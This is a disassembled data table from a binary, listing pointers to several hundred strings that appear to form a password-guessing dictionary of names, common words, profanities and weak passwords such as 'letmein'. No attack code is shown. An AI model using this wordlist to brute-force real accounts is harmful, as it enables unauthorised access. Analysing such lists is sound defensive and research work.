dd offset aAnthrax ; "anthrax"
dd offset aAnthropo ; "anthropo"
dd offset aAnvils ; "anvils"
dd offset aAnything ; "anything"
dd offset aApollo13 ; "apollo13"
dd offset aApril ; "april"
dd offset aAria ; "aria"
dd offset aAriadne ; "ariadne"
dd offset aArlene ; "arlene"
dd offset aArmy ; "army"
dd offset aArrow ; "arrow"
dd offset aArthur ; "arthur"
dd offset aArtist ; "artist"
dd offset aAsian ; "asian"
dd offset aAsshole ; "asshole"
dd offset aAthena ; "athena"
dd offset aAtmosphe ; "atmosphe"
dd offset aAtom ; "atom"
dd offset aAttack ; "attack"
dd offset aAuthoriz ; "authoriz"
dd offset aAztecs ; "aztecs"
dd offset aAzure ; "azure"
dd offset aBabe ; "babe"
dd offset aBaby ; "baby"
dd offset aBacchus ; "bacchus"
dd offset aBackdoor ; "backdoor"
dd offset aBadass ; "badass"
dd offset aBailey ; "bailey"
dd offset aBall ; "ball"
dd offset aBanana ; "banana"
dd offset aBananas ; "bananas"
dd offset aBandit ; "bandit"
dd offset aBank ; "bank"
dd offset aBanks ; "banks"
dd offset aBarbara ; "barbara"
dd offset aBarber ; "barber"
dd offset aBare ; "bare"
dd offset aBarf ; "barf"
dd offset aBaritone ; "baritone"
dd offset aBart ; "bart"
dd offset aBartman ; "bartman"
dd offset aBaseball ; "baseball"
dd offset aBasic ; "basic"
dd offset aBass ; "bass"
dd offset aBassoon ; "bassoon"
dd offset aBatch ; "batch"
dd offset aBatman ; "batman"
dd offset aBeach ; "beach"
dd offset aBeammeup ; "beammeup"
dd offset aBear ; "bear"
dd offset aBeast ; "beast"
dd offset aBeater ; "beater"
dd offset aBeauty ; "beauty"
dd offset aBeaver ; "beaver"
dd offset aBecky ; "becky"
dd offset aBeethove ; "beethove"
dd offset aBegin ; "begin"
dd offset aBehead ; "behead"
dd offset aBell ; "bell"
dd offset aBeloved ; "beloved"
dd offset aBenz ; "benz"
dd offset aBeowulf ; "beowulf"
dd offset aBerkeley ; "berkeley"
dd offset aBerlin ; "berlin"
dd offset aBerliner ; "berliner"
dd offset aBeryl ; "beryl"
dd offset aBeta ; "beta"
dd offset aBeth ; "beth"
dd offset aBetsie ; "betsie"
dd offset aBetty ; "betty"
dd offset aBeverly ; "beverly"
dd offset aBible ; "bible"
dd offset aBicamera ; "bicamera"
dd offset aBigfoot ; "bigfoot"
dd offset aBill ; "bill"
dd offset aBinary ; "binary"
dd offset aBios ; "bios"
dd offset aBird ; "bird"
dd offset aBishop ; "bishop"
dd offset aBitch ; "bitch"
dd offset aBitmap ; "bitmap"
dd offset aBitnet ; "bitnet"
dd offset aBlack ; "black"
dd offset aBlonde ; "blonde"
dd offset aBlondie ; "blondie"
dd offset aBlood ; "blood"
dd offset aBloodaxe ; "bloodaxe"
dd offset aBlow ; "blow"
dd offset aBlowjob ; "blowjob"
dd offset aBlue ; "blue"
dd offset aBlues ; "blues"
dd offset aBoard ; "board"
dd offset aBomb ; "bomb"
dd offset aBoner ; "boner"
dd offset aBoob ; "boob"
dd offset aBoobs ; "boobs"
dd offset aBook ; "book"
dd offset aBorn ; "born"
dd offset aBoyscout ; "boyscout"
dd offset aBradley ; "bradley"
dd offset aBrandi ; "brandi"
dd offset aBrandy ; "brandy"
dd offset aBravo ; "bravo"
dd offset aBreak ; "break"
dd offset aBreast ; "breast"
dd offset aBrenda ; "brenda"
dd offset aBrian ; "brian"
dd offset aBridget ; "bridget"
dd offset aBroadway ; "broadway"
dd offset aBrothel ; "brothel"
dd offset aBrunette ; "brunette"
dd offset aBrute ; "brute"
dd offset aBrutefor ; "brutefor"
dd offset aBulls ; "bulls"
dd offset aBullshit ; "bullshit"
dd offset aBumbling ; "bumbling"
dd offset aBung ; "bung"
dd offset aBurgess ; "burgess"
dd offset aBurn ; "burn"
dd offset aButch ; "butch"
dd offset aButt ; "butt"
dd offset aButthead ; "butthead"
dd offset aCaliforn ; "californ"
dd offset aCamille ; "camille"
dd offset aCampanil ; "campanil"
dd offset aCamping ; "camping"
dd offset aCandi ; "candi"
dd offset aCandy ; "candy"
dd offset aCantor ; "cantor"
dd offset aCaptain ; "captain"
dd offset aCapture ; "capture"
dd offset aCard ; "card"
dd offset aCardinal ; "cardinal"
dd offset aCaren ; "caren"
dd offset aCarla ; "carla"
dd offset aCarmen ; "carmen"
dd offset aCarol ; "carol"
dd offset aCarole ; "carole"
dd offset aCarolina ; "carolina"
dd offset aCaroline ; "caroline"
dd offset aCarrie ; "carrie"
dd offset aCarson ; "carson"
dd offset aCascades ; "cascades"
dd offset aCash ; "cash"
dd offset aCastle ; "castle"
dd offset aCatherin ; "catherin"
dd offset aCatholic ; "catholic"
dd offset aCathy ; "cathy"
dd offset aCave ; "cave"
dd offset aCayuga ; "cayuga"
dd offset aCecily ; "cecily"
dd offset aCelt ; "celt"
dd offset aCeltic ; "celtic"
dd offset aCeltics ; "celtics"
dd offset aCerulean ; "cerulean"
dd offset aChange ; "change"
dd offset aCharity ; "charity"
dd offset aCharles ; "charles"
dd offset aCharlie ; "charlie"
dd offset aCharming ; "charming"
dd offset aCharon ; "charon"
dd offset aChat_0 ; "chat"
dd offset aChem ; "chem"
dd offset aChemistr ; "chemistr"
dd offset aChess ; "chess"
dd offset aChester ; "chester"
dd offset aChip ; "chip"
dd offset aChris ; "chris"
dd offset aChristin ; "christin"
dd offset aChristy ; "christy"
dd offset aCigar ; "cigar"
dd offset aCigarett ; "cigarett"
dd offset aCindy ; "cindy"
dd offset aClass ; "class"
dd offset aClasses ; "classes"
dd offset aClassic ; "classic"
dd offset aClaudia ; "claudia"
dd offset aClaymore ; "claymore"
dd offset aCleavage ; "cleavage"
dd offset aClinton ; "clinton"
dd offset aCluster ; "cluster"
dd offset aClusters ; "clusters"
dd offset aCoast ; "coast"
dd offset aCocacola ; "cocacola"
dd offset aCocainco ; "cocainco"
dd offset aCock ; "cock"
dd offset aCode ; "code"
dd offset aCodename ; "codename"
dd offset aCodeword ; "codeword"
dd offset aCoffee ; "coffee"
dd offset aCoin ; "coin"
dd offset aCoke ; "coke"
dd offset aCola ; "cola"
dd offset aCold ; "cold"
dd offset aCollins ; "collins"
dd offset aColor ; "color"
dd offset aCombat ; "combat"
dd offset aComics ; "comics"
dd offset aCommit ; "commit"
dd offset aCommrade ; "commrade"
dd offset aCompany ; "company"
dd offset aComputin ; "computin"
dd offset aComrade ; "comrade"
dd offset aComrades ; "comrades"
dd offset aCondo ; "condo"
dd offset aCondom ; "condom"
dd offset aConnect ; "connect"
dd offset aConnie ; "connie"
dd offset aConserva ; "conserva"
dd offset aConsole ; "console"
dd offset aContinue ; "continue"
dd offset aCook ; "cook"
dd offset aCookbook ; "cookbook"
dd offset aCookie ; "cookie"
dd offset aCool ; "cool"
dd offset aCooper ; "cooper"
dd offset aCopper ; "copper"
dd offset aCops ; "cops"
dd offset aCopy ; "copy"
dd offset aCorneliu ; "corneliu"
dd offset aCorrect ; "correct"
dd offset aCounters ; "counters"
dd offset aCountry ; "country"
dd offset aCouscous ; "couscous"
dd offset aCowboy ; "cowboy"
dd offset aCrack ; "crack"
dd offset aCrackpot ; "crackpot"
dd offset aCream ; "cream"
dd offset aCreate ; "create"
dd offset aCreation ; "creation"
dd offset aCreature ; "creature"
dd offset aCredit ; "credit"
dd offset aCreosote ; "creosote"
dd offset aCretin ; "cretin"
dd offset aCrime ; "crime"
dd offset aCriminal ; "criminal"
dd offset aCristina ; "cristina"
dd offset aCrystal ; "crystal"
dd offset aCshrc ; "cshrc"
dd offset aCunt ; "cunt"
dd offset aCustomer ; "customer"
dd offset aCyber ; "cyber"
dd offset aCyberpun ; "cyberpun"
dd offset aCyberspa ; "cyberspa"
dd offset aCynthia ; "cynthia"
dd offset aDaemon ; "daemon"
dd offset aDaisy ; "daisy"
dd offset aDana ; "dana"
dd offset aDancer ; "dancer"
dd offset aDaniel ; "daniel"
dd offset aDanielle ; "danielle"
dd offset aDanny ; "danny"
dd offset aDapper ; "dapper"
dd offset aDark ; "dark"
dd offset aDarkaven ; "darkaven"
dd offset aData ; "data"
dd offset aDave ; "dave"
dd offset aDawn ; "dawn"
dd offset aDead ; "dead"
dd offset aDeathsta ; "deathsta"
dd offset aDebbie ; "debbie"
dd offset aDeborah ; "deborah"
dd offset aDebug ; "debug"
dd offset aDecember ; "december"
dd offset aDeck ; "deck"
dd offset aDefault ; "default"
dd offset aDefault_0 ; "DEFAULT"
dd offset aDefoe ; "defoe"
dd offset aDelta ; "delta"
dd offset aDeluge ; "deluge"
dd offset aDemocrat ; "democrat"
dd offset aDenise ; "denise"
dd offset aDennis ; "dennis"
dd offset aDesiree ; "desiree"
dd offset aDesk ; "desk"
dd offset aDesktop ; "desktop"
dd offset aDesperat ; "desperat"
dd offset aDevelop ; "develop"
dd offset aDevice ; "device"
dd offset aDial ; "dial"
dd offset aDiamond ; "diamond"
dd offset aDiana ; "diana"
dd offset aDiane ; "diane"
dd offset aDice ; "dice"
dd offset aDick ; "dick"
dd offset aDiehard ; "diehard"
dd offset aDiet ; "diet"
dd offset aDieter ; "dieter"
dd offset aDigital ; "digital"
dd offset aDinosaur ; "dinosaur"
dd offset aDipshit ; "dipshit"
dd offset aDirect ; "direct"
dd offset aDirector ; "director"
dd offset aDirty ; "dirty"
dd offset aDisc ; "disc"
dd offset aDiscipli ; "discipli"
dd offset aDisclose ; "disclose"
dd offset aDiscover ; "discover"
dd offset aDisk_0 ; "disk"
dd offset aDiskette ; "diskette"
dd offset aDisney ; "disney"
dd offset aDisplay_0 ; "display"
dd offset aDoctor ; "doctor"
dd offset aDollar ; "dollar"
dd offset aDong ; "dong"
dd offset aDoom ; "doom"
dd offset aDoom2 ; "doom2"
dd offset aDoomii ; "doomii"
dd offset aDoomsday ; "doomsday"
dd offset aDoonesbu ; "doonesbu"
dd offset aDoor ; "door"
dd offset aDoors ; "doors"
dd offset aDope ; "dope"
dd offset aDownload ; "download"
dd offset aDragon ; "dragon"
dd offset aDrdoom ; "drdoom"
dd offset aDrive ; "drive"
dd offset aDrought ; "drought"
dd offset aDuck ; "duck"
dd offset aDude ; "dude"
dd offset aDuelist ; "duelist"
dd offset aDuke ; "duke"
dd offset aDulce ; "dulce"
dd offset aDuncan ; "duncan"
dd offset aDungeon ; "dungeon"
dd offset aDyke ; "dyke"
dd offset aEager ; "eager"
dd offset aEagle ; "eagle"
dd offset aEarth ; "earth"
dd offset aEasier ; "easier"
dd offset aEasy ; "easy"
dd offset aEatme ; "eatme"
dd offset aEcho ; "echo"
dd offset aEddie ; "eddie"
dd offset aEdges ; "edges"
dd offset aEdinburg ; "edinburg"
dd offset aEdit ; "edit"
dd offset aEdition ; "edition"
dd offset aEducation ; "education"
dd offset aEducatio ; "educatio"
dd offset aEdwin ; "edwin"
dd offset aEdwina ; "edwina"
dd offset aEgghead ; "egghead"
dd offset aEiderdow ; "eiderdow"
dd offset aEileen ; "eileen"
dd offset aEinsiein ; "einsiein"
dd offset aEinstein ; "einstein"
dd offset aElaine ; "elaine"
dd offset aElanor ; "elanor"
dd offset aElectron ; "electron"
dd offset aElephant ; "elephant"
dd offset aElizabet ; "elizabet"
dd offset aEllen ; "ellen"
dd offset aEmail_0 ; "email"
dd offset aEmerald ; "emerald"
dd offset aEmily ; "emily"
dd offset aEmmanuel ; "emmanuel"
dd offset aEnemy ; "enemy"
dd offset aEngine ; "engine"
dd offset aEngineer ; "engineer"
dd offset aEngland ; "england"
dd offset aEnglish ; "english"
dd offset aEnter ; "enter"
dd offset aEnterpri ; "enterpri"
dd offset aEnzyme ; "enzyme"
dd offset aErenity ; "erenity"
dd offset aEric ; "eric"
dd offset aErica ; "erica"
dd offset aErika ; "erika"
dd offset aErin ; "erin"
dd offset aErotic ; "erotic"
dd offset aErsatz ; "ersatz"
dd offset aEstablis ; "establis"
dd offset aEstate ; "estate"
dd offset aEternity ; "eternity"
dd offset aEuclid ; "euclid"
dd offset aEvelyn ; "evelyn"
dd offset aExpert ; "expert"
dd offset aExplode ; "explode"
dd offset aExplore ; "explore"
dd offset aExplorer ; "explorer"
dd offset aExplosiv ; "explosiv"
dd offset aExtensio ; "extensio"
dd offset aFairway ; "fairway"
dd offset aFaith ; "faith"
dd offset aFalcon ; "falcon"
dd offset aFalse ; "false"
dd offset aFamily ; "family"
dd offset aFarad ; "farad"
dd offset aFaraday ; "faraday"
dd offset aFart ; "fart"
dd offset aFast ; "fast"
dd offset aFear ; "fear"
dd offset aFeds ; "feds"
dd offset aFelicia ; "felicia"
dd offset aFender ; "fender"
dd offset aFermat ; "fermat"
dd offset aFerrari ; "ferrari"
dd offset aFidelity ; "fidelity"
dd offset aField ; "field"
dd offset aFight ; "fight"
dd offset aFile ; "file"
dd offset aFinite ; "finite"
dd offset aFire ; "fire"
dd offset aFirewall ; "firewall"
dd offset aFishers ; "fishers"
dd offset aFlakes ; "flakes"
dd offset aFloat ; "float"
dd offset aFlorida ; "florida"
dd offset aFlower ; "flower"
dd offset aFlowers ; "flowers"
dd offset aFood ; "food"
dd offset aFool ; "fool"
dd offset aFoolproo ; "foolproo"
dd offset aFootball ; "football"
dd offset aForce ; "force"
dd offset aFord ; "ford"
dd offset aForesigh ; "foresigh"
dd offset aForever ; "forever"
dd offset aForm ; "form"
dd offset aFormat ; "format"
dd offset aFornicat ; "fornicat"
dd offset aForsythe ; "forsythe"
dd offset aFourier ; "fourier"
dd offset aFoxtrot ; "foxtrot"
dd offset aFrance ; "france"
dd offset aFrank ; "frank"
dd offset aFreak ; "freak"
dd offset aFred ; "fred"
dd offset aFree ; "free"
dd offset aFreedom ; "freedom"
dd offset aFrench ; "french"
dd offset aFriday ; "friday"
dd offset aFriend ; "friend"
dd offset aFriends ; "friends"
dd offset aFrighten ; "frighten"
dd offset aFrog ; "frog"
dd offset aFryguy ; "fryguy"
dd offset aFuck ; "fuck"
dd offset aFucker ; "fucker"
dd offset aFucking ; "fucking"
dd offset aFuckme ; "fuckme"
dd offset aFuckyou ; "fuckyou"
dd offset aFudge ; "fudge"
dd offset aFunction ; "function"
dd offset aFungible ; "fungible"
dd offset aGabriel ; "gabriel"
dd offset aGames ; "games"
dd offset aGardner ; "gardner"
dd offset aGarfield ; "garfield"
dd offset aGateway ; "gateway"
dd offset aGatherin ; "gatherin"
dd offset aGatt ; "gatt"
dd offset aGauss ; "gauss"
dd offset aGeorge ; "george"
dd offset aGerm ; "germ"
dd offset aGertrude ; "gertrude"
dd offset aGhost ; "ghost"
dd offset aGibson ; "gibson"
dd offset aGigabyte ; "gigabyte"
dd offset aGina ; "gina"
dd offset aGinger ; "ginger"
dd offset aGirl ; "girl"
dd offset aGlacier ; "glacier"
dd offset aGold ; "gold"
dd offset aGolden ; "golden"
dd offset aGolf ; "golf"
dd offset aGolfer ; "golfer"
dd offset aGood ; "good"
dd offset aGorgeous ; "gorgeous"
dd offset aGorges ; "gorges"
dd offset aGosling ; "gosling"
dd offset aGouge ; "gouge"
dd offset aGovermen ; "govermen"
dd offset aGrades ; "grades"
dd offset aGraham ; "graham"
dd offset aGrahm ; "grahm"
dd offset aGrand ; "grand"
dd offset aGrant ; "grant"
dd offset aGreat ; "great"
dd offset aGreen ; "green"
dd offset aGroup ; "group"
dd offset aGryphon ; "gryphon"
dd offset aGuardian ; "guardian"
dd offset aGucci ; "gucci"
dd offset aGuess ; "guess"
dd offset aGuitar ; "guitar"
dd offset aGumption ; "gumption"
dd offset aGuntis ; "guntis"
dd offset aHack ; "hack"
dd offset aHacked ; "hacked"
dd offset aHagar ; "hagar"
dd offset aHair ; "hair"
dd offset aHallowee ; "hallowee"
dd offset aHamlet ; "hamlet"
dd offset aHamster ; "hamster"
dd offset aHandel ; "handel"
dd offset aHandily ; "handily"
dd offset aHandjob ; "handjob"
dd offset aHappenin ; "happenin"
dd offset aHard ; "hard"
dd offset aHardcore ; "hardcore"
dd offset aHarddriv ; "harddriv"
dd offset aHarmony ; "harmony"
dd offset aHarold ; "harold"
dd offset aHarvey ; "harvey"
dd offset aHate ; "hate"
dd offset aHaven ; "haven"
dd offset aHawaii ; "hawaii"
dd offset aHead ; "head"
dd offset aHeadbang ; "headbang"
dd offset aHeat ; "heat"
dd offset aHeathen ; "heathen"
dd offset aHeather ; "heather"
dd offset aHebrides ; "hebrides"
dd offset aHeidi ; "heidi"
dd offset aHeinlein ; "heinlein"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aHelp ; "help"
dd offset aHerb ; "herb"
dd offset aHerbert ; "herbert"
dd offset aHero ; "hero"
dd offset aHeroin ; "heroin"
dd offset aHewlett ; "hewlett"
dd offset aHexadeci ; "hexadeci"
dd offset aHiawatha ; "hiawatha"
dd offset aHibernia ; "hibernia"
dd offset aHidden ; "hidden"
dd offset aHigh ; "high"
dd offset aHighland ; "highland"
dd offset aHitler ; "hitler"
dd offset aHits ; "hits"
dd offset aHole ; "hole"
dd offset aHolly ; "holly"
dd offset aHollywoo ; "hollywoo"
dd offset aHomepage ; "homepage"
dd offset aHomer ; "homer"
dd offset aHomework ; "homework"
dd offset aHoney ; "honey"
dd offset aHooker ; "hooker"
dd offset aHooters ; "hooters"
dd offset aHorny ; "horny"
dd offset aHorrible ; "horrible"
dd offset aHorror ; "horror"
dd offset aHorse ; "horse"
dd offset aHorus ; "horus"
dd offset aHost ; "host"
dd offset aHotdog ; "hotdog"
dd offset aHotel ; "hotel"
dd offset aHttp_0 ; "http"
dd offset aHunt ; "hunt"
dd offset aHunter ; "hunter"
dd offset aHutchins ; "hutchins"
dd offset aHydrogen ; "hydrogen"
dd offset aHyper ; "hyper"
dd offset aHypertxt ; "hypertxt"
dd offset aIcecream ; "icecream"
dd offset aIllumina ; "illumina"
dd offset aImage ; "image"
dd offset aImbrogli ; "imbrogli"
dd offset aImmortal ; "immortal"
dd offset aImperial ; "imperial"
dd offset aInclude ; "include"
dd offset aIndia ; "india"
dd offset aIndian ; "indian"
dd offset aIndiana ; "indiana"
dd offset aIndians ; "indians"
dd offset aIngres ; "ingres"
dd offset aIngress ; "ingress"
dd offset aIngrid ; "ingrid"
dd offset aInna ; "inna"
dd offset aInnocuou ; "innocuou"
dd offset aInput ; "input"
dd offset aInside ; "inside"
dd offset aInteger ; "integer"
dd offset aInvent ; "invent"
dd offset aIrene ; "irene"
dd offset aIrishman ; "irishman"
dd offset aIsis ; "isis"
dd offset aJackie ; "jackie"
dd offset aJail ; "jail"
dd offset aJane ; "jane"
dd offset aJanet ; "janet"
dd offset aJanice ; "janice"
dd offset aJanie ; "janie"
dd offset aJapan ; "japan"
dd offset aJasmin ; "jasmin"
dd offset aJava ; "java"
dd offset aJazz ; "jazz"
dd offset aJean ; "jean"
dd offset aJeanne ; "jeanne"
dd offset aJeff ; "jeff"
dd offset aJenni ; "jenni"
dd offset aJennifer ; "jennifer"
dd offset aJenny ; "jenny"
dd offset aJerry ; "jerry"
dd offset aJerusale ; "jerusale"
dd offset aJessica ; "jessica"
dd offset aJester ; "jester"
dd offset aJewelry ; "jewelry"
dd offset aJill ; "jill"
dd offset aJixian ; "jixian"
dd offset aJoanne ; "joanne"
dd offset aJody ; "jody"
dd offset aJohn ; "john"
dd offset aJohndoe ; "johndoe"
dd offset aJohnny ; "johnny"
dd offset aJoseph ; "joseph"
dd offset aJoshua ; "joshua"
dd offset aJournal ; "journal"
dd offset aJoyce ; "joyce"
dd offset aJudith ; "judith"
dd offset aJudy ; "judy"
dd offset aJuggle ; "juggle"
dd offset aJuicy ; "juicy"
dd offset aJulia ; "julia"
dd offset aJulie ; "julie"
dd offset aJuliet ; "juliet"
dd offset aJune ; "june"
dd offset aJupiter ; "jupiter"
dd offset aKaka ; "kaka"
dd offset aKaren ; "karen"
dd offset aKarie ; "karie"
dd offset aKarina ; "karina"
dd offset aKatana ; "katana"
dd offset aKate ; "kate"
dd offset aKathleen ; "kathleen"
dd offset aKathrine ; "kathrine"
dd offset aKathy ; "kathy"
dd offset aKatina ; "katina"
dd offset aKatrina ; "katrina"
dd offset aKelly ; "kelly"
dd offset aKeri ; "keri"
dd offset aKermit ; "kermit"
dd offset aKernel ; "kernel"
dd offset aKerri ; "kerri"
dd offset aKerrie ; "kerrie"
dd offset aKerry ; "kerry"
dd offset aKevin ; "kevin"
dd offset aKewl ; "kewl"
dd offset aKeybord ; "keybord"
dd offset aKeyin ; "keyin"
dd offset aKeyword ; "keyword"
dd offset aKids ; "kids"
dd offset aKill ; "kill"
dd offset aKillthem ; "killthem"
dd offset aKilo ; "kilo"
dd offset aKimberly ; "kimberly"
dd offset aKing ; "king"
dd offset aKirk ; "kirk"
dd offset aKirkland ; "kirkland"
dd offset aKiss ; "kiss"
dd offset aKissmyas ; "kissmyas"
dd offset aKitten ; "kitten"
dd offset aKlingon ; "klingon"
dd offset aKnife ; "knife"
dd offset aKnight ; "knight"
dd offset aKnightma ; "knightma"
dd offset aKnown ; "known"
dd offset aKrista ; "krista"
dd offset aKristen ; "kristen"
dd offset aKristi ; "kristi"
dd offset aKristie ; "kristie"
dd offset aKristin ; "kristin"
dd offset aKristine ; "kristine"
dd offset aKristy ; "kristy"
dd offset aLadies ; "ladies"
dd offset aLadle ; "ladle"
dd offset aLakers ; "lakers"
dd offset aLambda ; "lambda"
dd offset aLaminati ; "laminati"
dd offset aLana ; "lana"
dd offset aLaptop ; "laptop"
dd offset aLara ; "lara"
dd offset aLarkin ; "larkin"
dd offset aLarry ; "larry"
dd offset aLaser ; "laser"
dd offset aLaura ; "laura"
dd offset aLava ; "lava"
dd offset aLazarus ; "lazarus"
dd offset aLazer ; "lazer"
dd offset aLeah ; "leah"
dd offset aLebesgue ; "lebesgue"
dd offset aLeft ; "left"
dd offset aLeftwing ; "leftwing"
dd offset aLegal ; "legal"
dd offset aLeland ; "leland"
dd offset aLeroy ; "leroy"
dd offset aLesbian ; "lesbian"
dd offset aLeslie ; "leslie"
dd offset aLetmein ; "letmein"
dd offset aLewis ; "lewis"
dd offset aLexluthe ; "lexluthe"
dd offset aLiberal ; "liberal"
dd offset aLibrary ; "library"
dd offset aLick ; "lick"
dd offset aLicker ; "licker"
dd offset aLife ; "life"
dd offset aLight ; "light"
dd offset aLightsab ; "lightsab"
dd offset aLima ; "lima"
dd offset aLimbaugh ; "limbaugh"
dd offset aLimited ; "limited"
dd offset aLinda ; "linda"
dd offset aLink ; "link"
dd offset aLion ; "lion"
dd offset aLips ; "lips"
dd offset aLisa ; "lisa"
dd offset aLisp ; "lisp"
dd offset aLiteratu ; "literatu"
dd offset aLive ; "live"
dd offset aLoad ; "load"
dd offset aLock ; "lock"
dd offset aLockout ; "lockout"
dd offset aLockword ; "lockword"
dd offset aLogic ; "logic"
dd offset aLoginwor ; "loginwor"
dd offset aLogout ; "logout"
dd offset aLois ; "lois"
dd offset aLolopc ; "lolopc"
dd offset aLoose ; "loose"
dd offset aLore ; "lore"
dd offset aLori ; "lori"
dd offset aLorin ; "lorin"
dd offset aLorraine ; "lorraine"
dd offset aLoser ; "loser"
dd offset aLouis ; "louis"
dd offset aLovebug ; "lovebug"
dd offset aLover ; "lover"
dd offset aLuck ; "luck"
dd offset aLucus ; "lucus"
dd offset aLucy ; "lucy"
dd offset aLude ; "lude"
dd offset aLuke ; "luke"
dd offset aLust ; "lust"
dd offset aLynn ; "lynn"
dd offset aLynne ; "lynne"
dd offset aMachine ; "machine"
dd offset aMacintos ; "macintos"
dd offset aMack ; "mack"
dd offset aMacro ; "macro"
dd offset aMaggot ; "maggot"
dd offset aMagic ; "magic"
dd offset aMagnet ; "magnet"
dd offset aMail ; "mail"
dd offset aMaint ; "maint"
dd offset aMalcolm ; "malcolm"
dd offset aMalcom ; "malcom"
dd offset aMana ; "mana"
dd offset aManager ; "manager"
dd offset aMara ; "mara"
dd offset aMarci ; "marci"
dd offset aMarcy ; "marcy"
dd offset aMaria ; "maria"
dd offset aMariens ; "mariens"
dd offset aMarietta ; "marietta"
dd offset aMarijuan ; "marijuan"
dd offset aMarines ; "marines"
dd offset aMark ; "mark"
dd offset aMarkus ; "markus"
dd offset aMarni ; "marni"
dd offset aMarriage ; "marriage"
dd offset aMars ; "mars"
dd offset aMarty ; "marty"
dd offset aMarvin ; "marvin"
dd offset aMary ; "mary"
dd offset aMason ; "mason"
dd offset aMaster ; "master"
dd offset aMath ; "math"
dd offset aMaurice ; "maurice"
dd offset aMeagan ; "meagan"
dd offset aMegabyte ; "megabyte"
dd offset aMegadeth ; "megadeth"
dd offset aMegan ; "megan"
dd offset aMelissa ; "melissa"
dd offset aMellon ; "mellon"
dd offset aMelrose ; "melrose"
dd offset aMember ; "member"
dd offset aMemory ; "memory"
dd offset aMenace ; "menace"
dd offset aMenu ; "menu"
dd offset aMercury ; "mercury"
dd offset aMerlin ; "merlin"
dd offset aMetal ; "metal"
dd offset aMetalhea ; "metalhea"
dd offset aMetalica ; "metalica"
dd offset aMets ; "mets"
dd offset aMice ; "mice"
dd offset aMichael ; "michael"
dd offset aMichel ; "michel"
dd offset aMichelan ; "michelan"
dd offset aMichele ; "michele"
dd offset aMichelle ; "michelle"
dd offset aMickey ; "mickey"
dd offset aMicro ; "micro"
dd offset aMicrochi ; "microchi"
dd offset aMicropro ; "micropro"
dd offset aMicrosof ; "microsof"
dd offset aMidieval ; "midieval"
dd offset aMike ; "mike"
dd offset aMine ; "mine"
dd offset aMinimum ; "minimum"
dd offset aMinsky ; "minsky"
dd offset aMisfit ; "misfit"
dd offset aMission ; "mission"
dd offset aMkii ; "mkii"
dd offset aMode ; "mode"
dd offset aModem ; "modem"
dd offset aMogul ; "mogul"
dd offset aMoguls ; "moguls"
dd offset aMonday ; "monday"
dd offset aMonica ; "monica"
dd offset aMoom ; "moom"
dd offset aMoor ; "moor"
dd offset aMoose ; "moose"
dd offset aMore ; "more"
dd offset aMorley ; "morley"
dd offset aMorris ; "morris"
dd offset aMortal ; "mortal"
dd offset aMortalco ; "mortalco"
dd offset aMortgage ; "mortgage"
dd offset aMosaic ; "mosaic"
dd offset aMountain ; "mountain"
dd offset aMouse ; "mouse"
dd offset aMove ; "move"
dd offset aMovie ; "movie"
dd offset aMovies ; "movies"
dd offset aMozart ; "mozart"
dd offset aMpeg ; "mpeg"
dd offset aMsdos ; "msdos"
dd offset aMuppets ; "muppets"
dd offset aMutant ; "mutant"
dd offset aNagel ; "nagel"
dd offset aName ; "name"
dd offset aNancy ; "nancy"
dd offset aNapoleon ; "napoleon"
dd offset aNasa ; "nasa"
dd offset aNavy ; "navy"
dd offset aNepenthe ; "nepenthe"
dd offset aNeptune ; "neptune"
dd offset aNess ; "ness"
dd offset aNetscape ; "netscape"
dd offset aNetwork_0 ; "network"
dd offset aNewborn ; "newborn"
dd offset aNews ; "news"
dd offset aNewsgrou ; "newsgrou"
dd offset aNewton ; "newton"
dd offset aNewyork ; "newyork"
dd offset aNext ; "next"
dd offset aNice ; "nice"
dd offset aNicole ; "nicole"
dd offset aNicotine ; "nicotine"
dd offset aNight ; "night"
dd offset aNightmar ; "nightmar"
dd offset aNintendo ; "nintendo"
dd offset aNita ; "nita"
dd offset aNnaacp ; "nnaacp"
dd offset aNoble ; "noble"
dd offset aNobody ; "nobody"
dd offset aNode ; "node"
dd offset aNoreen ; "noreen"
dd offset aNotes ; "notes"
dd offset aNoth ; "noth"
dd offset aNova ; "nova"
dd offset aNovel ; "novel"
dd offset aNovember ; "november"
dd offset aNoxious ; "noxious"
dd offset aNuclear ; "nuclear"
dd offset aNude ; "nude"
dd offset aNuke ; "nuke"
dd offset aNukem ; "nukem"
dd offset aNull_1 ; "null"
dd offset aNumber ; "number"
dd offset aNutritio ; "nutritio"
dd offset aNuts ; "nuts"
dd offset aNyquist ; "nyquist"
dd offset aObscurit ; "obscurit"
dd offset aOceanogr ; "oceanogr"
dd offset aOcelot ; "ocelot"
off_430050 dd offset aOffice ; DATA XREF: ___:0042606C�o
; "office"
dd offset aOkay ; "okay"
dd offset aOldage ; "oldage"
off_43005C dd offset aOlivetti ; DATA XREF: ___:off_425F08�o
; "olivetti"
dd offset aOlivia ; "olivia"
dd offset aOmega ; "omega"
dd offset aOpen ; "open"
dd offset aOpening ; "opening"
dd offset aOpenlock ; "openlock"
dd offset aOpensesa ; "opensesa"
dd offset aOperator ; "operator"
dd offset aOrca ; "orca"
dd offset aOrient ; "orient"
dd offset aOrwell ; "orwell"
dd offset aOscar ; "oscar"
dd offset aOsiris ; "osiris"
dd offset aOutdoors ; "outdoors"
dd offset aOutlaw ; "outlaw"
dd offset aOutput ; "output"
dd offset aOutside ; "outside"
dd offset aOxford ; "oxford"
dd offset aPacific ; "pacific"
dd offset aPackard ; "packard"
dd offset aPacker ; "packer"
dd offset aPainless ; "painless"
dd offset aPaint ; "paint"
dd offset aPakistan ; "pakistan"
dd offset aPamela ; "pamela"
dd offset aPapa ; "papa"
dd offset aPaper ; "paper"
dd offset aPapers ; "papers"
dd offset aPascal ; "pascal"
dd offset aPassphra ; "passphra"
dd offset aPaste ; "paste"
dd offset aPatricia ; "patricia"
dd offset aPatriot ; "patriot"
dd offset aPatty ; "patty"
dd offset aPaula ; "paula"
dd offset aPeanuts ; "peanuts"
dd offset aPecker ; "pecker"
dd offset aPencil ; "pencil"
dd offset aPenelope ; "penelope"
dd offset aPenguin ; "penguin"
dd offset aPenis ; "penis"
dd offset aPenname ; "penname"
dd offset aPentagon ; "pentagon"
dd offset aPentagra ; "pentagra"
dd offset aPenthous ; "penthous"
dd offset aPentium ; "pentium"
dd offset aPeoria ; "peoria"
dd offset aPepper ; "pepper"
dd offset aPercolat ; "percolat"
dd offset aPerfect ; "perfect"
dd offset aPermit ; "permit"
dd offset aPersimmo ; "persimmo"
dd offset aPersona ; "persona"
dd offset aPervert ; "pervert"
dd offset aPete ; "pete"
